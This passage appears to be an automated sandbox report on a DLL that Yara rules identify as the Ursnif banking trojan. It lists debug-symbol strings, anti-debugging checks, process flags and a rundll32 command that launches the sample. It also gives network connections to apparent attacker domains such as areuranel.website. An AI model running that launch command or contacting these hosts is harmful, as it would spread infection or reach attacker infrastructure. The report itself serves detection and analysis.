                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb[ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb# source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb% source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000018.00000003.521770649.000000000090B000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3EC72 push D5DD2AEAh; iretd
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E90AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AEC72 push D5DD2AEAh; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E90AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E90AB9A push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000018.00000002.553524158.0000000004891000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmp, WerFault.exe, 00000012.00000002.531474027.0000000005282000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.541015107.0000000004C87000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.549834890.00000000047C4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWen-USn7
                      Source: WerFault.exe, 00000012.00000002.531217612.0000000005260000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E92C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E938861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E97DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E97DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E97DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E92C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E938861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E97DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E97DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E97DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E92C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E938861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E97DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E97DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E97DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.98.207.210 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
